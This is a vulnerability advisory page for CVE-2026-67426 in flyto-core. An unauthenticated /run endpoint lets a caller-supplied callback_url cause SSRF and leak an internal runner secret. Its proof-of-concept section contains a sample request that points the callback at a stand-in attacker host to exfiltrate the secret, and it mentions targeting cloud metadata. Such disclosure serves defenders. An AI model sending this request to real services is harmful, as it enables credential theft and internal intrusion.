criticalCVSS 9.3Vulnerability

CVE-2026-67426

## Summary The standalone `flyto-verification` service exposes `POST /run` with **no authentication**, on all interfaces (0.0.0.0:8344 per the shipped Dockerfile). The request body's `callback_url` is used verbatim for an outbound POST that **unconditionally attaches `X-Internal-Key: $FLYTO_RUNNER_SECRET`**. The `callback_url` bypasses the service's `target_allowed` allowlist (which only inspects `params.target_url`) and is never passed through any SSRF guard. This yields (a) unauthenticated SSRF to internal/metadata endpoints with an attacker-controlled JSON body, and (b) exfiltration of the internal runner secret to an attacker-controlled host — allowing forged authenticated callbacks to the real engine. ## Root Cause - `src/core/verification_service.py:363-364` — `/run` has no `Depends`/auth dependency. - `resolve_callback_url` returns the client `callback_url` verbatim (`:315-316`). - `post_callback` attaches `X-Internal-Key: $FLYTO_RUNNER_SECRET` whenever the env var is set (`:327-335`). - `target_allowed` only gates `params.target_url` (`:259`), never `callback_url`. No `validate_url_*` anywhere in the file. - `Dockerfile.verification` CMD = `main('0.0.0.0', 8344)`; entrypoint `flyto-verification` in `pyproject.toml:107` → the shipped image binds all interfaces by default. ## Impact Unauthenticated (PR:N) readable SSRF to internal/cloud-metadata with a controlled body (C:H, S:C), plus theft of `FLYTO_RUNNER_SECRET` to an attacker host → the attacker can then authenticate to the real engine callback endpoint (credential compromise, CWE-522). ## Proof of Concept Code-proven this session (all lines confirmed on v2.26.6): ``` POST http://<verification-host>:8344/run {"workflowYaml":"...","params":{...},"callback_url":"http://attacker.tld/collect"} # -> service POSTs to attacker.tld with header X-Internal-Key: <FLYTO_RUNNER_SECRET> # Or callback_url=http://<cloud-metadata-ip>/... for internal SSRF with a controlled body. ``` ## Attack Chain 1. Entry: unauthenti

Properties

severity
critical
summary
Flyto2 Core: Unauthenticated flyto-verification /run: callback_url SSRF and internal runner-secret exfiltration
epss_score
0.00308
cvss_score
9.3
ghsa_published
2026-07-30T14:47:41Z
source_url
https://github.com/advisories/GHSA-jx74-cqjv-2c67
ghsa_updated
2026-07-30T14:47:43Z
ghsa_id
GHSA-jx74-cqjv-2c67
cve_id
CVE-2026-67426
cvss_vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
signal_observed_at
2026-09-11T17:55:57+00:00
is_ghsa_only
false
epss_percentile
0.23431

Related Entities (7)

ENRICHED_BY (1)

[Source]FIRST EPSS

VULNERABLE_TO (1)

[Software]pip/flyto-core

AFFECTS (1)

[Software]pip/flyto-core

HAS_WEAKNESS (3)

[Weakness]Missing Authentication for Critical Function
[Weakness]Insufficiently Protected Credentials
[Weakness]Server-Side Request Forgery (SSRF)

REPORTED_BY (1)

[Source]GitHub Advisory Database

Explore deeper with Ninja Signal's threat intelligence graph

CVE-2026-67426 (CVSS 9.3) — Ninja Signal Threat Intelligence | Ninja Signal